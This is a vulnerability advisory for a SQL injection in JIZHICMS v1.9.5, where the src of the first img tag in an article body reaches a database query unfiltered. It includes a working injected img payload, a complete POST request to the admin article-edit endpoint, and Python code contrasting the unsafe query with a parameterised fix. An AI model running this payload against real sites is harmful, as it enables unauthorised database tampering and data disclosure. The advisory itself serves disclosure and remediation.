Brief introduction

SQL Injection vulnerability in JIZHICMS v1.9.5 via the add or edit article

Vulnerability Description:

In the article function of JIZHICMS V1.9.5, when no picture is set at the time an article is published, JIZHICMS uses the first img tag in the body as the article picture (litpic). During this extraction the img tag's parameters are not checked or filtered before they are used in the database query, which results in SQL injection.
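To make the extraction-then-query flow concrete, here is an added Python reconstruction of the pattern the description implies; it is not JIZHICMS's own PHP code, and the table name, column names, schema and the img regex are assumptions. It pulls the first img src from the body and shows the unsafe variant splicing it into the UPDATE text (yielding extra SET clauses) beside a hardened variant that validates the value as an image URL and binds it as a parameter.

```python
import re
import sqlite3
from urllib.parse import urlparse

# Constructed sample article body; the <img> tag is the decoded one from the report's request.
SAMPLE_BODY = '<p>hello</p><img src="http://a.com/a.jpg\', title = version() , orders = \'1"/>'

IMG_SRC_RE = re.compile(r'<img[^>]+src\s*=\s*"([^"]*)"', re.IGNORECASE)


def first_img_src(body):
    """Return the src of the first <img> in body (the litpic fallback the report describes), or None."""
    m = IMG_SRC_RE.search(body)
    return m.group(1) if m else None


def build_update_vulnerable(article_id, litpic):
    """Hypothetical unsafe pattern: the extracted src is spliced straight into the UPDATE text."""
    return f"UPDATE article SET litpic = '{litpic}' WHERE id = {int(article_id)}"


def is_safe_image_url(value):
    """Accept only an absolute http(s) URL with a host, an image extension and no quote/space characters."""
    p = urlparse(value)
    return (p.scheme in ("http", "https")
            and bool(p.netloc)
            and p.path.lower().endswith((".jpg", ".jpeg", ".png", ".gif", ".webp"))
            and not any(c in value for c in "'\"\\ "))


def update_litpic_safe(conn, article_id, litpic):
    """Hardened form: validate the value, then bind it as a parameter so it cannot change the statement."""
    if not is_safe_image_url(litpic):
        return False
    conn.execute("UPDATE article SET litpic = ? WHERE id = ?", (litpic, int(article_id)))
    conn.commit()
    return True


def make_db():
    """In-memory stand-in for the article table (constructed schema, not the CMS's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, litpic TEXT, orders INTEGER)")
    conn.execute("INSERT INTO article VALUES (33, 'test', '', 0)")
    return conn


def article_row(conn, article_id):
    return conn.execute("SELECT title, litpic FROM article WHERE id = ?", (article_id,)).fetchone()


if __name__ == "__main__":
    src = first_img_src(SAMPLE_BODY)
    print("unsafe SQL   :", build_update_vulnerable(33, src))   # three SET clauses, not one
    conn = make_db()
    print("safe accepted:", update_litpic_safe(conn, 33, src), article_row(conn, 33))
```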


Reproduction:

Steps to reproduce:

  1. Open the article editing page, submit the form, and intercept the request so it can be modified

  2. Set litpic and body in the intercepted request to the following values respectively, then send it

litpic=''
body=<img+src%3d"http%3a//a.com/a.jpg',+title+%3d+version()+,+orders+%3d+'1"/>

Payload:

POST /admin.php/Article/editarticle.html HTTP/1.1
Host: jizhicms.test
Content-Length: 237
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://jizhicms.test
Referer: http://jizhicms.test/admin.php/Article/editarticle/id/33.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=pjhk5trh72fq0eeobrn81bmba4
Connection: close

go=1&id=33&title=test&tid=2&seo_title=test&hits=0&keywords=&litpic=&file=&description=&orders=0&tags=&isshow=1&addtime=2021-06-27+22%3A14%3A16&target=&ownurl=&body=<img+src%3d"http%3a//a.com/a.jpg',+title+%3d+version()+,+orders+%3d+'1"/>